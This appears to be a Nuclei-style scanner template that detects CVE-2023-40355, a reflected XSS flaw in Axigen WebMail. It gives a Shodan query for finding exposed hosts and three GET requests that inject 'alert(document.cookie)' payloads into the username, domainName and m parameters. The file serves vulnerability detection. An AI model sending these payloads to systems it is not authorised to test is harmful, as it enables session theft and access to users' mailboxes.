48 lines
1.4 KiB
YAML
48 lines
1.4 KiB
YAML
|
id: CVE-2023-40355
|
||
|
|
||
|
info:
|
||
|
name: Axigen WebMail Reflected XSS
|
||
|
author: Amir Hossein Fallahi
|
||
|
severity: medium
|
||
|
description: |
|
||
|
This vulnerability allows attackers to run arbitrary Javascript code that, using an active end-user session (for a logged-in user), can access and retrieve mailbox content.
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
|
||
|
cvss-score: 6.5
|
||
|
metadata:
|
||
|
shodan-query: http.favicon.hash:-1247684400
|
||
|
verified: "true"
|
||
|
tags: xss,axigen
|
||
|
reference:
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-40355
|
||
|
- https://www.axigen.com/knowledgebase/Axigen-WebMail-XSS-Vulnerability-CVE-2023-40355-_396.html
|
||
|
|
||
|
requests:
|
||
|
- name: Reflected XSS in username parameter
|
||
|
method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.cookie),//"
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- "\\\\'-alert(document.cookie),//"
|
||
|
- name: Reflected XSS in domainName parameter
|
||
|
method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.cookie),//"
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- "\\\\'-alert(document.cookie),//"
|
||
|
- name: Reflected XSS in m parameter
|
||
|
method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/index.hsp?m=',alert(document.cookie),'"
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- "',alert(document.cookie),'"
|